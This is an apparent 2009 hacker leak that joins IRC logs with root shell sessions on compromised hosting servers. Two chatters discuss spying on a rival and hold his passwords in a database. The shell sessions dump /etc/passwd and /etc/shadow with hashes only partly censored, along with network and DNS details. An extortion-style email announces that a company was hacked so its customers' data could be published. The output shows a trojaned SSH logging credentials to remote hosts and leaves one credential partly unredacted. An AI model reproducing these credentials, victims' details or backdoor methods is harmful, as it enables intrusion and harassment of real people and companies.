16:15 (Glyph) ?
16:15 (Glyph) Oh.. that stuff
16:15 (Glyph) Old stuff.. was playing more or less.
16:16 (Glyph) Course my 'playtime' tends to lead to profitability ;)
16:16 (Glyph) All that is at least five years old or older.
16:16 (Glyph) circa 2005
16:17 (RoMeO) yeah
16:17 (RoMeO) thinking of setting up a box for dark
16:17 (RoMeO) see what is he going to do
16:17 (RoMeO) ofcourse everything will be patched to log in's and out's // HOOKIN.. HOOKOUT.. 
16:18 (Glyph) Well you know the saying.. friends close, enemies closer ;)
16:18 (RoMeO) yeah
16:18 (RoMeO) sure do
16:18 (Glyph) Can't believe spike threw error's like that, and that's what he recommended?
16:18 (RoMeO) lol
16:19 (RoMeO) thats why i want to see what is he goign to do on a box
16:19 (RoMeO) anyone can talk
16:19 (RoMeO) specially on the internet
16:19 (Glyph) I'm beginning to think he 'talk's a good game'..
16:19 (Glyph) snap!
16:19 (RoMeO) :P
16:19 (RoMeO) thats what i heared from everyone so far
16:19 (RoMeO) i will even give him a none chrooted shell
16:19 (Glyph) Have you lost your mind?
16:19 (RoMeO) lol
16:19 (Glyph) Damn if I'd trust him that far.
16:20 (RoMeO) it will be an empty box
16:20 (Glyph) jailed, maybe.. unjailed never.
16:20 (RoMeO) and every shell is modified to log to a remote system
16:20 (Glyph) Now yer sounding like me.
16:20 (RoMeO) i will sit there wth a cop of tea and tail -f
16:21 (Glyph) tail -f firewall | grep 'insert key phrase of the day here' 
16:28 (RoMeO) reading stories about knuth
16:28 (RoMeO) how to own a continent for example
16:28 (RoMeO) that one is amazing
16:29 (Glyph) It's NOT hard.
16:29 (RoMeO) if you didnt read it, you should
16:38 (RoMeO) i was looking around dark for a while
16:38 (RoMeO) and what surprised me is
16:38 (RoMeO) his really low-quality passwords
16:38 (RoMeO) like
16:38 (RoMeO) 123123
16:38 (RoMeO) or 123pass
16:38 (RoMeO) etc
16:38 (RoMeO) made me go ?
16:39 (Glyph) almost as bad as qwerty12345
16:39 (RoMeO) yes
16:40 (RoMeO) just one more thing that shows he is talk-only
16:40 (RoMeO) okay he can argue that he doesnt 'reuse passwords'  but using really weak passwords -does- mean something
16:40 (Glyph) worse yet.. he could be a c&p
16:40 (RoMeO) that would be so bad
16:43 (Glyph) Yeah.. it would.
16:44 (Glyph) Actually, I sometimes think you and he are one in same and are playing 'mindfuck' with me.
16:44 (RoMeO) hahaa
16:44 (RoMeO) why would we tho
16:45 (Glyph) Because you were bored with the brainless fucks we normally encounter.
16:46 (RoMeO) when that happens i just log on a shell and explore ;p
16:46 (RoMeO) one more thing
16:46 (RoMeO) dark is a yahoo user
16:46 (RoMeO) that counts 
16:47 (RoMeO) thats -100 sec points
16:47 (RoMeO) i do tag people by there email s too
16:47 (RoMeO) for example
16:47 (RoMeO) yahoo users,  mostly newbies / females
16:48 (RoMeO) hotmail users, same thing but a higher level a small higher level
16:48 (RoMeO) gmail users are on top and above that comes the people with there own mail servers 
16:48 (RoMeO) its alot deeper than that, but thats just a quick explanation :P
16:50 (RoMeO) found 2 passwords of dark in my db
16:50 (RoMeO) and they both fail
16:50 (RoMeO) hellohello is one of them -_-'
--- Log closed Mon Jun 22 16:55:25 2009

--- Log opened Tue Jun 23 17:19:55 2009
17:19 (Glyph) ?
17:20 (RoMeO) 15:23:42 (Glyph) Apache/2.2.11 (FreeBSD)
17:20 (RoMeO) 15:24:33 (Glyph) Johnny_Demonik
17:20 (RoMeO) 15:27:48 (Glyph) ERROR: Database error.
17:20 (Glyph) Ahhh...
17:21 (Glyph) He came up out of 64.127.41.18
17:22 (RoMeO) ah
17:22 (Glyph) That ip is apparently a 'shell' anyhow there's port 9050 on it.
17:22 (Glyph) But it goes back to WestVirginia..
17:22 (RoMeO) yeah
17:23 (Glyph) Firm called Compucrash
17:23 (Glyph) Their webserver is at .3 of that range.
17:23 (RoMeO) alrit, lets just hope he comes back here, busy with another hack ;p
17:23 (Glyph) So silly me, I tried to access their ircd thru their webpage.
17:23 (RoMeO) lol
17:24 (Glyph) That's when the MySQL threw the error code at me.
17:24 (Glyph) Then I checked the forums.
17:24 (Glyph) You wouldn't believe it.. PHPBB3
17:24 (Glyph) Pr0nsters have already been at it.
17:24 (RoMeO) lmao
17:24 (RoMeO) yea
17:25 (RoMeO) i saw that one
17:25 (Glyph) Not heavily.. but that's prolly because it's 'under the radar'
17:25 (Glyph) Plus the bw is pricey as heck.
17:26 (Glyph) I'm heading home..
17:26 (Glyph) You have a good un.
17:26 (RoMeO) thanks
17:26 (RoMeO) enjoy
--- Log closed Tue Jun 23 17:31:25 2009

--- Log opened Wed Jun 24 17:11:08 2009
17:11 [Glyph(Glyph@mods.govsec.org)] http://74.125.47.132/search?q=cache:jdsSh2XXmQAJ:www.fcc.gov/mb/engineering/2008_PSIDs_form325.xls+%22MetroCast+Communications+of+Mississippi%22&cd=12&hl=en&ct=clnk&gl=us
--- Log closed Wed Jun 24 17:16:42 2009

--- Log opened Sat Jun 27 23:05:38 2009
23:09 8/[g    <\  \_/   \/    ^   /
 \_____  /__/\_ \\_____  /\____   | 
       \/      \/      \/      |__| 
      .__  __         .__                                   .___                             
___  _|__|/  |______  |  |   ____________   ____   ____   __| _/______ 
\  \/ /  \   __\__  \ |  |  /  ___/\____ \_/ __ \_/ __ \ / __ |/  ___/ 
 \   /|  ||  |  / __ \|  |__\___ \ |  |_> >  ___/\  ___// /_/ |\___ \  
  \_/ |__||__| (____  /____/____  >|   __/ \___  >\___  >____ /____  > 
                    \/          \/ |__|        \/     \/     \/    \/  
          __________                _________              
          \______   \_______  ____ /   _____/ ____   ____  
  ______   |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
 /_____/   |    |     |  | \(  <_> )        \  ___/\  \___ 
           |____|     |__|   \____/_______  /\___  >\___  >
                                          \/     \/     \/ 

root@light [/]# hostname
light.co1.org
root@light [/]# uname -a
Linux light.co1.org 2.6.17.5-HN-2.3-P4 #1 SMP Sat Jul 15 09:55:04 EDT 2006 i686 i686 i386 GNU/Linux
root@light [/]# date
Tue Jun 23 20:06:26 EDT 2009
root@light [/]# cd /home
root@light [/home]# ls
./            blndbill/       .cpcpan/        deevour/   group88/   joshd/     lost+found/     nglgorg/     r00t/      timc/
../           blueacre/       cpeasyapache/   denial/    hadrys/    karbassi/  mapmap/         nickg/       radical/   timc14/
amp3dne/      bziem/          cprestore/      digital/   handknit/  kcole/     maraka/         noct/        rannman/   tmp/
animal/       cache/          cpzendinstall/  drireign/  harry3/    kidc/      mrwoot/         nycrob/      raven/     tradefx/
apadana/      cawn/           craig/          edgein/    hasting/   knokes/    msupike/        olliee/      robotey/   untitled/
aquota.user*  cfurn/          ctcped/         fran459/   hastings/  kozmo/     munin/          pioneer/     russ43/    values/
army/         charice/        curator/        func88/    ircmilw/   kujio/     MySQL-install/  plumcree/    sheik/     vincent/
auxone/       chemmer/        daelenbe/       futonre/   jamesj/    kyle/      national/       porch46/     starr/     virtfs/
badassb/      christa/        danielc/        fxarbitr/  jb007/     lakeshor/  neptunes/       prime/       stopcand/  vitus/
bebe/         cmilone/        ddosmyi/        ganja/     jeffhem/   light/     netdevil/       psurge/      sub/       wrench/
berkel/       .cpan/          dear/           ganja51/   jer1h/     lithium/   netenberg/      qstud/       syscrash/  yasha/
billing/      cpapachebuild/  decalsby/       greg93/    jkaiser/   lost/      nglgnet/        quota.user*  tickah/
root@light [/home]# 

root@light [/home]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
amp3dne:x:32005:32006::/home/amp3dne:/usr/local/cpanel/bin/noshell
auxone:x:32006:32007::/home/auxone:/bin/false
badassb:x:32007:32008::/home/badassb:/usr/local/cpanel/bin/noshell
cache:x:32011:32012::/home/cache:/usr/local/cpanel/bin/noshell
cawn:x:32012:32013::/home/cawn:/bin/false
cfurn:x:32013:32014::/home/cfurn:/bin/false
cmilone:x:32016:32017::/home/cmilone:/usr/local/cpanel/bin/noshell
craig:x:32017:32018::/home/craig:/usr/local/cpanel/bin/noshell
dear:x:32021:32022::/home/dear:/bin/false
drireign:x:32024:32025::/home/drireign:/usr/local/cpanel/bin/noshell
fran459:x:32028:32029::/home/fran459:/usr/local/cpanel/bin/noshell
futonre:x:32030:32031::/home/futonre:/usr/local/cpanel/bin/noshell
greg93:x:32031:32032::/home/greg93:/usr/local/cpanel/bin/noshell
harry3:x:32034:32035::/home/harry3:/usr/local/cpanel/bin/noshell
jkaiser:x:32039:32040::/home/jkaiser:/usr/local/cpanel/bin/noshell
joshd:x:32040:32041::/home/joshd:/bin/false
kcole:x:32041:32042::/home/kcole:/usr/local/cpanel/bin/noshell
kidc:x:32042:32043::/home/kidc:/usr/local/cpanel/bin/noshell
kozmo:x:32043:32044::/home/kozmo:/usr/local/cpanel/bin/noshell
light:x:32047:32048::/home/light:/usr/local/cpanel/bin/noshell
lost:x:32049:32050::/home/lost:/usr/local/cpanel/bin/noshell
msupike:x:32057:32058::/home/msupike:/usr/local/cpanel/bin/noshell
neptunes:x:32058:32059::/home/neptunes:/bin/sh
nickg:x:32060:32061::/home/nickg:/usr/local/cpanel/bin/noshell
olliee:x:32061:32062::/home/olliee:/usr/local/cpanel/bin/noshell
pioneer:x:32063:32064::/home/pioneer:/usr/local/cpanel/bin/noshell
plumcree:x:32064:32065::/home/plumcree:/usr/local/cpanel/bin/noshell
porch46:x:32065:32066::/home/porch46:/usr/local/cpanel/bin/noshell
qstud:x:32066:32067::/home/qstud:/usr/local/cpanel/bin/noshell
rannman:x:32068:32069::/home/rannman:/usr/local/cpanel/bin/noshell
sheik:x:32079:32080::/home/sheik:/usr/local/cpanel/bin/noshell
starr:x:32081:32082::/home/starr:/usr/local/cpanel/bin/noshell
stopcand:x:32083:32084::/home/stopcand:/usr/local/cpanel/bin/noshell
timc14:x:32089:32090::/home/timc14:/usr/local/cpanel/bin/noshell
values:x:32090:32091::/home/values:/bin/sh
vitus:x:32091:32092::/home/vitus:/usr/local/cpanel/bin/noshell
yasha:x:32099:32100::/home/yasha:/usr/local/cpanel/bin/noshell
tickah:x:32103:32104::/home/tickah:/usr/local/cpanel/bin/noshell
charice:x:32106:32107::/home/charice:/bin/false
animal:x:32109:32110::/home/animal:/usr/local/cpanel/bin/noshell
ganja51:x:32110:32111::/home/ganja51:/bin/false
ganja:x:32111:32112::/home/ganja:/usr/local/cpanel/bin/noshell
mrwoot:x:32113:32114::/home/mrwoot:/usr/local/cpanel/bin/noshell
karbassi:x:32114:32115::/home/karbassi:/usr/local/cpanel/bin/noshell
nycrob:x:32115:32116::/home/nycrob:/bin/false
radical:x:32118:32119::/home/radical:/usr/local/cpanel/bin/noshell
jer1h:x:32119:32120::/home/jer1h:/bin/false
denial:x:32121:32122::/home/denial:/usr/local/cpanel/bin/noshell
jamesj:x:32123:32124::/home/jamesj:/usr/local/cpanel/bin/noshell
nglgnet:x:32124:32125::/home/nglgnet:/usr/local/cpanel/bin/noshell
nglgorg:x:32125:32126::/home/nglgorg:/usr/local/cpanel/bin/noshell
russ43:x:32126:32128::/home/russ43:/usr/local/cpanel/bin/noshell
berkel:x:32127:32129::/home/berkel:/usr/local/cpanel/bin/noshell
hastings:x:32128:32130::/home/hastings:/usr/local/cpanel/bin/noshell
knokes:x:32129:32131::/home/knokes:/usr/local/cpanel/bin/noshell
decalsby:x:32132:32134::/home/decalsby:/usr/local/cpanel/bin/noshell
lakeshor:x:32134:32136::/home/lakeshor:/usr/local/cpanel/bin/noshell
army:x:32136:32138::/home/army:/bin/false
curator:x:32138:32140::/home/curator:/bin/false
tradefx:x:32142:32144::/home/tradefx:/usr/local/cpanel/bin/noshell
national:x:32146:32148::/home/national:/usr/local/cpanel/bin/jailshell
robotey:x:32147:32149::/home/robotey:/bin/false
vincent:x:32148:32150::/home/vincent:/usr/local/cpanel/bin/noshell
psurge:x:32149:32151::/home/psurge:/usr/local/cpanel/bin/noshell
prime:x:32150:32152::/home/prime:/bin/false
digital:x:32151:32153::/home/digital:/usr/local/cpanel/bin/noshell
ddosmyi:x:32153:32155::/home/ddosmyi:/usr/local/cpanel/bin/noshell
blueacre:x:32155:32157::/home/blueacre:/usr/local/cpanel/bin/noshell
kujio:x:32157:32159::/home/kujio:/bin/false
untitled:x:32158:32160::/home/untitled:/usr/local/cpanel/bin/noshell
danielc:x:32159:32161::/home/danielc:/bin/false
billing:x:32163:32165::/home/billing:/usr/local/cpanel/bin/jailshell
syscrash:x:32164:32166::/home/syscrash:/usr/local/cpanel/bin/jailshell
hasting:x:32165:32167::/home/hasting:/usr/local/cpanel/bin/noshell
wrench:x:32166:32168::/home/wrench:/usr/local/cpanel/bin/noshell
apadana:x:32167:32169::/home/apadana:/usr/local/cpanel/bin/noshell
ircmilw:x:32169:32171::/home/ircmilw:/usr/local/cpanel/bin/noshell
blndbill:x:32170:32172::/home/blndbill:/usr/local/cpanel/bin/noshell
edgein:x:32171:32173::/home/edgein:/usr/local/cpanel/bin/noshell
hadrys:x:32172:32174::/home/hadrys:/usr/local/cpanel/bin/noshell
bebe:x:32173:32175::/home/bebe:/usr/local/cpanel/bin/noshell
mapmap:x:32176:32178::/home/mapmap:/usr/local/cpanel/bin/noshell
cpanel-horde:x:32003:32004::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpanel/bin/noshell
cpanel-phpmyadmin:x:32008:32009::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/local/cpanel/bin/noshell
cpanel-phppgadmin:x:32009:32010::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/local/cpanel/bin/noshell
kyle:x:32177:32179::/home/kyle:/bin/false
ctcped:x:32178:32180::/home/ctcped:/usr/local/cpanel/bin/noshell
fxarbitr:x:32179:32181::/home/fxarbitr:/usr/local/cpanel/bin/noshell
func88:x:32180:32182::/home/func88:/bin/bash
cpanelhorde:x:32010:32011::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32014:32015::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32020:32021::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32023:32024::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
christa:x:32181:32183::/home/christa:/usr/local/cpanel/bin/noshell
bziem:x:32182:32184::/home/bziem:/usr/local/cpanel/bin/noshell
jb007:x:32183:32185::/home/jb007:/usr/local/cpanel/bin/jailshell
timc:x:32185:32187::/home/timc:/usr/local/cpanel/bin/noshell
munin:x:32186:32188::/home/munin:/bin/bash
noct:x:32187:32189::/home/noct:/usr/local/cpanel/bin/jailshell
jeffhem:x:32188:32190::/home/jeffhem:/usr/local/cpanel/bin/noshell
chemmer:x:32189:32191::/home/chemmer:/usr/local/cpanel/bin/noshell
daelenbe:x:32190:32192::/home/daelenbe:/usr/local/cpanel/bin/noshell
deevour:x:32191:32193::/home/deevour:/bin/bash
raven:x:32192:32194::/home/raven:/usr/local/cpanel/bin/noshell
lithium:x:32193:32195::/home/lithium:/usr/local/cpanel/bin/noshell
netdevil:x:510:510::/home/netdevil:/usr/local/cpanel/bin/noshell
sub:x:511:511::/home/sub:/usr/local/cpanel/bin/noshell
r00t:x:512:512::/home/r00t:/usr/local/cpanel/bin/noshell
maraka:x:513:513::/home/maraka:/usr/local/cpanel/bin/noshell
root@light [/home]# 


root@light [~]# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.181  Bcast:66.197.170.191  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:66876060 errors:0 dropped:0 overruns:0 frame:0
          TX packets:81485342 errors:0 dropped:1 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:652037555 (621.8 MiB)  TX bytes:1600708482 (1.4 GiB)
          Interrupt:16 Base address:0xd000 

eth0:1    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.182  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

eth0:2    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.183  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

eth0:3    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.185  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

eth0:4    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.186  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

eth0:5    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.184  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

gre0      Link encap:UNSPEC  HWaddr 00-00-00-00-FF-00-00-00-00-00-00-00-00-00-00-00  
          NOARP  MTU:1476  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:38383139 errors:0 dropped:0 overruns:0 frame:0
          TX packets:38383139 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:3605264865 (3.3 GiB)  TX bytes:3605264865 (3.3 GiB)

tunl0     Link encap:IPIP Tunnel  HWaddr   
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

root@light [~]# cat /var/named/ownage.net.db
; Modified by Web Host Manager
; Zone File for ownage.net
$TTL 14400
@       86400   IN      SOA     dns.vitalspeeds.com.    support.vitalspeeds.com.        (
                                        2006111702
                                        86400
                                        7200
                                        3600000
                                        86400
                                        )

ownage.net.     86400   IN      NS      dns.vitalspeeds.com.
ownage.net.     86400   IN      NS      ns2.vitalspeeds.com.


ownage.net.     14400   IN      A       72.20.28.204

localhost.ownage.net.   14400   IN      A       127.0.0.1

ownage.net.     14400   IN      MX      0       ownage.net.

mail    14400   IN      CNAME   ownage.net.
www     14400   IN      CNAME   ownage.net.
ftp     14400   IN      CNAME   ownage.net.
absolute.ownage.net.    14400   IN      A       72.20.28.205
talk.about.ownage.net.  14400   IN      A       72.20.18.131
complete.ownage.net.    14400   IN      A       72.20.28.206




_______         _______   .________
\   _  \ ___  __\   _  \  |   ____/
/  /_\  \\  \/  /  /_\  \ |____  \ 
\  \_/   \>    <\  \_/   \/       \
 \_____  /__/\_ \\_____  /______  /
       \/      \/      \/       \/ 
                __                     .__          __  .__                      
  _____ _____  |  | ______  __________ |  |  __ ___/  |_|__| ____   ____   ______
 /     \\__  \ |  |/ /  _ \/  ___/  _ \|  | |  |  \   __\  |/  _ \ /    \ /  ___/
|  Y Y  \/ __ \|    <  <_> )___ (  <_> )  |_|  |  /|  | |  (  <_> )   |  \\___ \ 
|__|_|  (____  /__|_ \____/____  >____/|____/____/ |__| |__|\____/|___|  /____  >
      \/     \/     \/         \/                                      \/     \/ 
          __________                _________              
          \______   \_______  ____ /   _____/ ____   ____  
  ______   |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
 /_____/   |    |     |  | \(  <_> )        \  ___/\  \___ 
           |____|     |__|   \____/_______  /\___  >\___  >
                                          \/     \/     \/ 


Delivered-To: glafkos@gmail.com
Received: by 10.223.117.209 with SMTP id s17cs437044faq;
        Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
Return-Path: 
Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
        by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
	 Thu, 2 Jul 2009 13:31:22 -0700
Message-ID: 
Return-Path: glafk0s@hotmail.com
Content-Type: multipart/alternative;
	boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"


X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)


From: james knuth 
To: , , ,
	, , ,
	, ,
	, , ,
	, ,
	, , ,
	, ,
	, ,
	, ,
	, , ,
	
Subject: Makosolutions, LLC
Date: Thu, 2 Jul 2009 22:31:22 +0200
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]

MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
    - Hacked.

I will keep this short and simple, you hosted someone I want down and I decided to take down your company 
and publish your customers information for that.

// This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..


HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ

                +----------------------------[ Owned ]----------------------------+
                |          Hack everyone you can and then hack some more          |
                |                           Owned[DC] v2                          |
                |                   _______ . _______ . _______                   |
                |             Get in as anonymous, Leave with no trace.           |
                |                                                                 |
                +-----------------------------------------------------------------+
         [ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]

 08:24:44 up 519 days, 11:20,  3 users,  load average: 0.05, 0.10, 0.09
makos2   pts/1        61.17.231.6      Fri Jun 26 08:12   still logged in   
makos2   pts/3        61.17.231.6      Fri Jun 26 04:10 - 04:25  (00:15)    
makos2   pts/7        61.17.231.6      Fri Jun 26 04:09 - 04:09  (00:00)    
makos2   pts/5        61.17.231.6      Fri Jun 26 03:58 - 04:09  (00:11)    
makos2   pts/4        61.17.231.6      Fri Jun 26 03:54   still logged in   

wtmp begins Tue Jun  2 01:09:06 2009
Owned[DC]:[~]# date
Fri Jun 26 08:26:44 EDT 2009
Owned[DC]:[~]# uname -a
Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
Owned[DC]:[~]# 


Owned[DC]:[~]# cd /var/run/ssh
Owned[DC]:[/var/run]# gcc -o decode decode.c 
Owned[DC]:[/var/run]# ./decode ssh.old 
HOOKOUT: 67.225.142.98 root:_censored_
HOOKIN: root:_censored_
HOOKOUT: 66.96.220.213 root:_censored_
.
.
.
HOOKIN: makos2:_censored_
HOOKOUT: 64.191.116.202 root:_censored_

Owned[DC]:[/var/run]# w
 08:32:59 up 519 days, 11:28,  3 users,  load average: 0.23, 0.22, 0.13
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
makos2   pts/0    61.17.231.6      03:53    3:54   0.13s  0.00s sshd: makos2 [priv]
makos2   pts/1    61.17.231.6      08:12    6.00s  0.06s  0.01s sshd: makos2 [priv]
makos2   pts/4    61.17.231.6      03:54   18:40   0.02s  0.01s sshd: makos2 [priv]
Owned[DC]:[/var/run]# 

Owned[DC]:[/var/run]# cat /etc/shadow
root:_censored_:14418:0:99999:7:::
bin:*:13901:0:99999:7:::
daemon:*:13901:0:99999:7:::
adm:*:13901:0:99999:7:::
lp:*:13901:0:99999:7:::
sync:*:13901:0:99999:7:::
shutdown:*:13901:0:99999:7:::
halt:*:13901:0:99999:7:::
mail:*:13901:0:99999:7:::
news:*:13901:0:99999:7:::
uucp:*:13901:0:99999:7:::
operator:*:13901:0:99999:7:::
games:*:13901:0:99999:7:::
gopher:*:13901:0:99999:7:::
ftp:*:13901:0:99999:7:::
nobody:*:13901:0:99999:7:::
dbus:!!:13901:0:99999:7:::
vcsa:!!:13901:0:99999:7:::
rpm:!!:13901:0:99999:7:::
haldaemon:!!:13901:0:99999:7:::
netdump:!!:13901:0:99999:7:::
nscd:!!:13901:0:99999:7:::
sshd:!!:13901:0:99999:7:::
rpc:!!:13901:0:99999:7:::
mailnull:!!:13901:0:99999:7:::
smmsp:!!:13901:0:99999:7:::
pcap:!!:13901:0:99999:7:::
xfs:!!:13901:0:99999:7:::
pegasus:!!:13901:0:99999:7:::
mysql:!!:13901::::::
mailman:*:13901::::::
cpanel:*:13901::::::
systuser:!!:13901:0:99999:7:::
named:!!:13901::::::
clamav:!!:13901::::::
dorothy:_censored_:14126:0:99999:7:::
fileport:_censored_:13902:0:99999:7:::
icstune:_censored_:13902:0:99999:7:::
krisez:_censored_$LRTAc0.mSw4a72zaVSGJd0:13902:0:99999:7:::
kurwaun:_censored_$Y5V5WC30jDTB7h2HEuPWv0:13902:0:99999:7:::
makos:_censored_$6sPV/Yt2K90ah60vxrRE/.:14418:0:99999:7:::
makos2:_censored_$gUs1XceJmqOgEaHbeaQJN/:14418:0:99999:7:::
marcin:_censored_$CZjERtIuP0ob.TJhixQr5.:13902:0:99999:7:::
mdots:_censored_$JCyJyAL8iXQMeOQbF0jMo.:13902:0:99999:7:::
mklounge:_censored_$1Uw2zWBge5A2GLQqWS5Mn.:13902:0:99999:7:::
nashv:_censored_$h/475XUYdCfNl2N.mgPgV0:13902:0:99999:7:::
rogo:_censored_$6V878RKV1W/E4NPoGJHKu/:14192:0:99999:7:::
spanish:_censored_$h902kmWzyxUw1wwSMWWyp/:13902:0:99999:7:::
sprynet:_censored_$Zm2b8RGX0d8/qo5tSuJA3/:13902:0:99999:7:::
statewi:_censored_$EPK2zdk0Z9ET48XrRcsKJ1:14376:0:99999:7:::
tarocon:_censored_$6me2YVq3JQ0PeDFLV7Aml0:14073:0:99999:7:::
sprycha:_censored_$osQE8JvfI0lC/r464r1.30:13903:0:99999:7:::
hplounge:_censored_$59BBs5nOeFGPRO8hEj1F1.:13922:0:99999:7:::
cozy:_censored_$tj.rlOAmhdwJm6fdWPvv2.:13923:0:99999:7:::
cpanel-horde:*:13949::::::
cpanel-phpmyadmin:*:13949::::::
cpanel-phppgadmin:*:13949::::::
makospam:_censored_$9mTDWRT8N8NZ7hFUa.2Iv1:13962:0:99999:7:::
wiredbre:_censored_$jc6LduZz25ERlx0SSp6I8.:13980:0:99999:7:::
cybermun:_censored_$gSpGZJCyrf5eKoKXzoknb/:13984:0:99999:7:::
proto:_censored_$fuGMvBK.mAz7AO989Reqm/:14208:0:99999:7:::
tempecon:_censored_$M3wPHFn06YfnjqhpOoSis1:13995:0:99999:7:::
floralsi:_censored_$jboZSeeKKAecDPW7Xi8r01:13995:0:99999:7:::
serversh:_censored_$oh7hdFXLoQM7BtHaVIwDB0:13997:0:99999:7:::
simplify:_censored_$FRrjF78SYaCEyBK/zX9rU0:14025:0:99999:7:::
